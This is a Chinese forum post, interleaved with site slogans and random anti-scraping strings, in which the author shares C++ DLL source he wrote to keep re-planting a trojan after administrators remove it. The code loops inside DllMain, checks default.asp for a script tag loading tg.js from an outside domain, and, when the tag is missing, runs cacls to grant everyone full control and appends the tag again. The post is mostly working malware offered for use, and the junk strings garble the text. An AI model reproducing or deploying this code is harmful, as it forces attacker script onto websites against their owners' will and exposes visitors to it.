简单监控文件挂马程序制作
本人挂马语句经常被管理员KILL,但是自己也有管理员权限,保留的很好,既然被他发现了,怎么说我们也要强行挂上1天到2天,让他去重做系统去。下面是一个简单的监控某个文件,给予他访问的权限。然后在检查代码中有无我们事先插入的代码,没的话就插入,有的话,等等在
) r6 v( c; C# a' i, e 代码如下:电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站7 H8 h6 V# z" X% l* z, N
* i6 ^9 Q9 }4 x- g我爱电脑技术论坛#include "stdafx.h" www.520diannao.com* h2 j( g# l; N7 f6 ~( _/ `: P
#include "process.h" 我爱电脑技术社区--打造最好的电脑技术自学交流平台# ~: H6 \" K% C: _$ H) p
#include "windows.h"
& p- U/ k; P; V- ?电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站#include "string.h"
1 C$ v) V) s/ G T% `9 J/ A#include "iostream.h" 7 A5 ~+ L' B8 ]- ?3 I& ^' p& x
#include "fstream.h" 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站. v4 N8 V5 j9 n
char path2[256]="E:\\gxm\\default.asp";
( E& A: t" V$ \8 A$ Z' h- K: [' ~我爱电脑技术论坛char guama[256]="\n<script language=javascript src='http://www.gxm520.cn/tg.js'></script>"; 我爱电脑技术论坛- R# I, S. L& a: [5 g# K6 L4 T
BOOL APIENTRY DllMain( HANDLE hModule,
9 v' |9 j3 r9 O+ ] DWORD ul_reason_for_call,
8 r* B, v+ Q2 {" R. u LPVOID lpReserved
3 a( k' L* o1 W, b/ M ) 我爱电脑技术论坛 ^. c/ g$ c! v$ }/ t& X8 C* Z
{ 我爱电脑技术社区--打造最好的电脑技术自学交流平台* |+ C R8 H# B
switch ( ul_reason_for_call )
' v n: f/ Y6 C电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站 { 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站# D0 P( e: K7 ~0 d
case DLL_PROCESS_ATTACH:
- X5 ^3 J4 L) K; K: @www.520diannao.com {
1 ~# }, \" R$ e" o' `; b! |www.520diannao.com while(1) : r+ F! M' ?. P6 U+ |" G. w
{
5 K/ i5 Y; u3 L" k. o打造最好的电脑自学交流论坛ifstream ifs(path2); 打造最好的电脑自学交流论坛) k: |+ \4 u4 ?' { F, V
char FileContent[5000];
. B; H9 P( @6 w8 I电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站memset(FileContent,0,5000);//初始化FileContent 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站 u5 I6 u' c {- b3 j$ C2 }% d- E2 X# B
ifs.read(FileContent,5000);//读取数据 打造最好的电脑自学交流论坛, _$ z! I/ k7 g. A4 | Y4 l0 ?
ifs.close();//关闭ifstream对像 www.520diannao.com$ L4 m6 S N/ v9 P
if(strstr(FileContent,guama)==0)
1 f i; `6 ~, B# l5 @3 E% T1 J3 {, r{
# v, J; H3 U1 ? c) Mwww.520diannao.com char path1[256]="E:\\gxm\\default.asp "; //比变量path2多了一个空格
9 l F& C9 v e9 R- j. e char mingling[256]="cacls "; 我爱电脑技术论坛) @6 f- C# t/ l
strcat(mingling,path1);
/ I/ b0 X& ^4 j/ S! [! lwww.520diannao.com char ps[25]="/T /E /C /G everyone:F"; 打造最好的电脑自学交流论坛5 B3 a4 I. x2 ^8 n1 Q7 s. d
strcat(mingling,ps); 打造最好的电脑自学交流论坛$ @, q' X, b+ m2 C+ a- f' p
char mingling1[256]="cacls ";
4 l6 R3 F$ j) d: |. J% |/ Iwww.520diannao.com strcat(mingling1,path1);
+ K. X" {1 K) Z8 |/ n5 t! t, E% |, D% f char pa[30]="/T /E /C /G administrator:F";
5 v4 X; t' e8 c9 J/ O我爱电脑技术论坛 strcat(mingling1,pa); 我爱电脑技术论坛+ e7 |( c$ `4 o; ~7 g: L% }% b
system(mingling); www.520diannao.com, O, J) c8 M1 D. I
system(mingling1); 我爱电脑技术社区--打造最好的电脑技术自学交流平台: w/ y$ ~% { K! j9 f* z+ t
SetFileAttributes(path2,GetFileAttributes(path1) & ~FILE_ATTRIBUTE_READONLY); 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站3 i2 V1 i! [( E4 A, E9 `6 v0 T
ofstream outfile; 打造最好的电脑自学交流论坛1 z" y; d2 |- [) i( |6 x4 o
outfile.open(path2,ios::app);
" ~. i5 R' a- _, b2 @3 A我爱电脑技术社区--打造最好的电脑技术自学交流平台 if (!outfile)
, ~' O3 d8 J1 F6 r2 p! F) u+ E. |电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站 { 3 F8 o5 `: j3 p! E( t: {
exit(0); 我爱电脑技术论坛+ P, C. @, Y/ e0 N0 ]6 |
} 我爱电脑技术论坛4 [3 D8 |/ R. W
outfile<<guama; ) D5 `5 {2 Z2 C+ H9 m1 p
outfile.close(); 我爱电脑技术论坛8 M) b8 _6 x8 E0 r; }
}
: }+ j3 E, i/ T! \+ e6 |! X! p打造最好的电脑自学交流论坛Sleep(9000);
9 S/ d7 A7 E/ q我爱电脑技术论坛 }
- v: R) U. r7 u* ]+ Y( I* {! m我爱电脑技术社区--打造最好的电脑技术自学交流平台 }
- k0 R0 _4 B- W! b1 ^我爱电脑技术社区--打造最好的电脑技术自学交流平台 default: 打造最好的电脑自学交流论坛: z& \8 ~/ p" D4 C" O/ Z
return TRUE;
- t# R& Q( L% m( i; P- {我爱电脑技术论坛 }
8 f9 r' B- N# h8 C$ w/ r R我爱电脑技术论坛 return TRUE;
7 A- U9 ^/ o+ u) X' X6 ^% B/ P我爱电脑技术论坛}
. v7 I; P9 j2 j6 S! C
0 ~; U! q* S1 w+ ?8 J打造最好的电脑自学交流论坛
, z# @- P; b- W" u我爱电脑技术社区--打造最好的电脑技术自学交流平台 简单的监控文件程序的代码而已,我也不知道别人是怎么写的,反正自己是这样想出来一点一点的写点,希望对我们一样菜的人有点帮助。
